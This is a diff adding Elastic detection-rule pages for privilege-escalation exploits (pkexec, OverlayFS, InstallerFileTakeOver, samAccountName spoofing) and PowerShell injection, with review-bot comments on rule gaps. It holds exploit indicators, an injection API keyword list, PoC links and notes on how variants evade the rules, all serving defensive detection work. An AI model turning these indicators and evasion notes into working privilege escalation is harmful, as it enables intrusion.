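Review bot: `with runs=5` in the CVE-2023-4911 sequence above requires five matching exec events within 5 s sharing the same parent entity and executable, which fits the brute-force loop of the public PoC but not a single-shot exploit with a precomputed offset; document that limitation, or add a lower-confidence companion that fires on a single exec carrying `GLIBC_TUNABLES=glibc.*=glibc.*=`. The rule also relies on `process.env_vars` being populated; if Elastic Defend does not capture environment variables by default, the page needs a Setup section naming the setting to enable, otherwise the rule silently never matches.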
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc new file mode 100644 index 0000000000..1bb7cbeb6f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc 
@@ -0,0 +1,140 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover]] +=== Potential Privilege Escalation via InstallerFileTakeOver + +Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/klinix5/InstallerFileTakeOver + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Privilege Escalation via InstallerFileTakeOver + +InstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY. + +This rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Look for additional processes spawned by the process, command lines, and network communications. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- Verify whether a digital signature exists in the executable, and if it is valid. + +### Related rules + +- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.Ext.token.integrity_level_name : "System" and + ( + (process.name : "elevation_service.exe" and + not process.pe.original_file_name == "elevation_service.exe") or + + (process.name : "elevation_service.exe" and + not process.code_signature.trusted == true) or + + (process.parent.name : "elevation_service.exe" and + process.name : ("rundll32.exe", "cmd.exe", "powershell.exe")) + ) and + not + ( + process.name : "elevation_service.exe" and process.code_signature.trusted == true and + process.pe.original_file_name == null + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: 
https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc new file mode 100644 index 0000000000..64d8e0e528 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc 
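Review bot: the investigation step "searching for login events (for example, 4624) to the target host after the registry modification" in the InstallerFileTakeOver guide above refers to a registry modification this rule never detects (the query keys on an untrusted or renamed `elevation_service.exe` and on `rundll32.exe`/`cmd.exe`/`powershell.exe` spawned by it), so the sentence reads as carried over from a registry rule; change it to "after the alert" or drop it. The guide would also benefit from one line telling the analyst that the third query branch (a shell or rundll32 child of `elevation_service.exe` at System integrity) is the highest-confidence signal, since the first two branches can be tripped by a legitimately updated but unsigned-at-that-moment binary, which is what the final `not (...)` clause tries to exclude.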
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs]] +=== Potential Privilege Escalation via OverlayFS + +Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability +* https://twitter.com/liadeliyahu/status/1684841527959273472 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.entity_id, host.id with maxspan=5s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name == "unshare" and process.args : ("-r", "-rm", "m") and process.args : "*cap_setuid*" and user.id != "0"] + [process where host.os.type == "linux" and event.action == "uid_change" and event.type == "change" and + user.id == "0"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ 
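Review bot: `process.args : ("-r", "-rm", "m")` in the OverlayFS sequence above includes a bare `"m"` value, which as a whole-argument match only hits if `m` is passed as its own argument; the intended value is presumably `"-m"` (`unshare -r -m`, `unshare -rm`), and the long forms `--map-root-user` and `--mount` are not covered at all. Suggest `("-r", "-rm", "-m", "--map-root-user", "--mount")` and a comment explaining that the first step is looking for the user-namespace plus mount-namespace combination the public PoC uses.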
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc new file mode 100644 index 0000000000..8d156dd795 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc 
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec]] +=== Potential Privilege Escalation via PKEXEC + +Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://seclists.org/oss-sec/2022/q1/80 +* https://haxx.in/files/blasty-vs-pkexec.c + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Path Interception by PATH Environment Variable +** ID: T1574.007 +** Reference URL: https://attack.mitre.org/techniques/T1574/007/ 
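Review bot: the pkexec query above (`file where host.os.type == "linux" and file.path : "/*GCONV_PATH*"`) has no `event.type` or `event.action` restriction, so any read, rename or delete touching a path containing that substring alerts, and the indicator itself is tied to the public PoC's habit of creating a directory literally named `GCONV_PATH=.`; an exploit that uses a different directory name with its own `gconv-modules` file evades it entirely. Restrict the rule to creation events, and consider pairing it (as the OverlayFS and Python cap_setuid rules in this package do) with a follow-on `uid_change` to `user.id == "0"` from a `pkexec` process, which is the behavior the description actually promises to catch.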
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc new file mode 100644 index 0000000000..65bf554013 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc 
@@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid]] +=== Potential Privilege Escalation via Python cap_setuid + +This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args : "import os;os.set?id(0);os.system(*)" and process.args : "*python*" and user.id != "0"] + [process where host.os.type == "linux" and event.action in ("uid_change", "gid_change") and event.type == "change" and + (user.id == "0" or group.id == "0")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation 
+** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc new file mode 100644 index 0000000000..1cdfc3827f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc 
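Review bot: `process.args : "import os;os.set?id(0);os.system(*)"` in the Python cap_setuid sequence above is a whole-argument wildcard match, so any formatting variation misses: a space after the semicolon (`import os; os.setuid(0); ...`), `os.setresuid(0,0,0)`, `subprocess` instead of `os.system`, or the same code fed through a file or stdin instead of `-c`. Suggest `process.args : "*os.set?id(0)*"` so the surrounding text is irrelevant, plus `"*os.setres?id(0*"` for the three-argument forms. `maxspan=1s` is also tight for a sequence keyed on `process.entity_id`; the other sequences in this package use 5 s.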
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable]] +=== Potential Privilege Escalation via Recently Compiled Executable + +This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name in ("gcc", "g++", "cc") and user.id != "0"] by process.args + [file where host.os.type == "linux" and event.action == "creation" and event.type == "creation" and + process.name == "ld" and user.id != "0"] by file.name + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + user.id != "0"] by process.name + [process where host.os.type == "linux" and event.action in ("uid_change", "guid_change") and event.type == "change" and + user.id == "0"] by process.name + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for 
Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc new file mode 100644 index 0000000000..6334c75823 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc 
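Review bot: `event.action in ("uid_change", "guid_change")` in the last step of the Recently Compiled Executable sequence above looks like a typo for `gid_change` (the Python cap_setuid rule in this same package uses `("uid_change", "gid_change")`), so the gid branch can never fire; and since the step also requires `user.id == "0"`, a gid-only change to root would not match even with the name fixed. Either correct the action name and add `or group.id == "0"`, or drop the gid branch and say the rule keys on uid only. Separately, `by process.args` on the first step joins on a multi-valued field; confirm that the join behaves as intended with EQL array semantics, or join on `process.entity_id` instead.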
@@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected]] +=== Potential Privilege Escalation via UID INT_MAX Bug Detected + +This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/paragonsec/status/1071152249529884674 +* https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh +* https://gitlab.freedesktop.org/polkit/polkit/-/issues/74 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "systemd-run" and process.args == "-t" and process.args_count >= 3 and user.id >= "1000000000" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ 
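Review bot: `user.id >= "1000000000"` in the UID INT_MAX query above is a comparison between keyword strings, so it is lexicographic rather than numeric: `"2000"` and `"999"` both sort above `"1000000000"` and would alert, while the threshold the description promises (INT_MAX, 2147483647) is not what is encoded either. Because every UID above INT_MAX has exactly 10 digits and lexicographic order among equal-length digit strings is numeric order, `length(user.id) == 10 and user.id > "2147483647"` expresses the intended check without a numeric cast. The description should also name the CVE (CVE-2018-19788 appears only in the references) so the "older Linux versions" wording has something concrete behind it.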
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc new file mode 100644 index 0000000000..4ee1ee43de --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc 
@@ -0,0 +1,96 @@ +[[prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing]] +=== Potential Privileged Escalation via SamAccountName Spoofing + +Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e +* https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ +* https://github.com/cube0x0/noPac +* https://twitter.com/exploitph/status/1469157138928914432 +* https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring +* Data Source: Active Directory +* Use Case: Vulnerability + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +iam where event.action == "renamed-user-account" and + /* machine account name renamed to user like account name */ + winlog.event_data.OldTargetUserName : "*$" and not 
winlog.event_data.NewTargetUserName : "*$" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc new file mode 100644 index 0000000000..e277678242 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc 
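Review bot: the "Investigation guide" section of the SamAccountName Spoofing rule above is an empty `[source, markdown]` block; drop the section or fill it, and if it is filled add the `Resources: Investigation Guide` tag the other rules in this package carry. The heading and anchor say "Privileged Escalation" where the tags and tactic say "Privilege Escalation"; if the anchor must stay for link stability, fix at least the heading. The query itself (`renamed-user-account` from `*$` to a name without `$`) is the right signal for CVE-2021-42278, but the description's "standard domain user" wording should mention the prerequisite that the account can create or rename a machine account (the default `ms-DS-MachineAccountQuota` is what the referenced noPac tooling relies on), since that is what decides whether a low-privileged user can produce this event.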
@@ -0,0 +1,143 @@ +[[prebuilt-rule-8-10-5-potential-process-injection-via-powershell]] +=== Potential Process Injection via PowerShell + +Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1 +* https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1 +* https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1 +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Process Injection via PowerShell + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +PowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way, like the execution of inline C# code, PSReflect, Get-ProcAddress, etc. 
+ +Red Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject payloads directly into the memory without touching the disk to circumvent file-based security protections. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Check if the imported function was executed and which process it targeted. +- Check if the injected code can be retrieved (hardcoded in the script or on command line logs). + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or + LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and + (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or + SuspendThread or ResumeThread or GetDelegateForFunctionPointer) + ) and not + (user.id:("S-1-5-18" or "S-1-5-19") and + file.directory: "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Dynamic-link Library Injection +** ID: T1055.001 +** Reference URL: https://attack.mitre.org/techniques/T1055/001/ +* Sub-technique: +** Name: Portable Executable Injection +** ID: T1055.002 +** Reference URL: https://attack.mitre.org/techniques/T1055/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** 
ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc new file mode 100644 index 0000000000..f03963f667 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc 
